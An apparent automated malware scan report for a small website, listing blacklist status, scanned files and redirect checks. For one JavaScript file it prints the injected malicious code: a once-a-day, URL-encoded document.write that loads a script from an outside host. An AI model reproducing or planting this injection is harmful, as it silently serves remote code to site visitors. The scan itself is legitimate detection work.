Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=furui589.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://furui589.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://furui589.com/ | 200 OK Content-Length: 28730 Content-Type: text/html | clean |
http://furui589.com/statics/js1/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://furui589.com/statics/js1/marquee.js | 200 OK Content-Length: 3708 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){
$.fn.kxbdMarquee = function(options){ var opts = $.extend({},$.fn.kxbdMarquee.defaults, options); return this.each(function(){ var $marquee = $(this); var _scrollObj = $marquee.get(0); var scrollW = $marquee.width(); var scrollH = $marquee.height(); var $element = $marquee.children(); var $kids = $element.children(); var scrollSize=0; var _type = (opts.direction == 'left' || opts.direction == 'right') ? 1:0; $eleme }; })(jQuery); if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://furui589.com/statics/js1/scrollPic.js | 200 OK Content-Length: 7106 Content-Type: application/javascript | clean |
http://furui589.com/html/contact/ | 200 OK Content-Length: 15274 Content-Type: text/html | clean |
http://furui589.com/html/about/ | 200 OK Content-Length: 16826 Content-Type: text/html | clean |
http://furui589.com/index.php?m=guestbook&c=index&a=register | 200 OK Content-Length: 18570 Content-Type: text/html | clean |
http://www.furui589.com/statics/js/formvalidator.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.furui589.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.furui589.com/statics/js/formvalidatorregex.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://furui589.com/index.php?m=job&c=index | 200 OK Content-Length: 14495 Content-Type: text/html | clean |
http://furui589.com/sitemap.xml | 200 OK Content-Length: 16654 Content-Type: application/xml | clean |
http://furui589.com/sitemap.html | 200 OK Content-Length: 37651 Content-Type: text/html | clean |
http://furui589.com/admin.php | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 22 Dec 2014 19:38:20 GMT Location: index.php?m=admin Server: Apache Content-Length: 0 Content-Type: text/html | clean |
http://furui589.com/index.php?m=admin | 200 OK Content-Length: 2207 Content-Type: text/html | clean |
http://www.furui589.com/statics/js/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: furui589.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:37:52 GMT
Accept-Ranges: bytes
ETag: "1804d6f-703a-508a486fdec00"
Server: Apache
Content-Length: 28730
Content-Type: text/html
Last-Modified: Tue, 25 Nov 2014 01:06:56 GMT
...28730 bytes of data.
GET / HTTP/1.1
Host: furui589.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:37:52 GMT
Accept-Ranges: bytes
ETag: "1804d6f-703a-508a486fdec00"
Server: Apache
Content-Length: 28730
Content-Type: text/html
Last-Modified: Tue, 25 Nov 2014 01:06:56 GMT
...28730 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: furui589.com
Referer: http://www.google.com/search?q=furui589.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: furui589.com
Referer: http://www.google.com/search?q=furui589.com
Result:
The result is similar to the first query. There are no suspicious redirects found.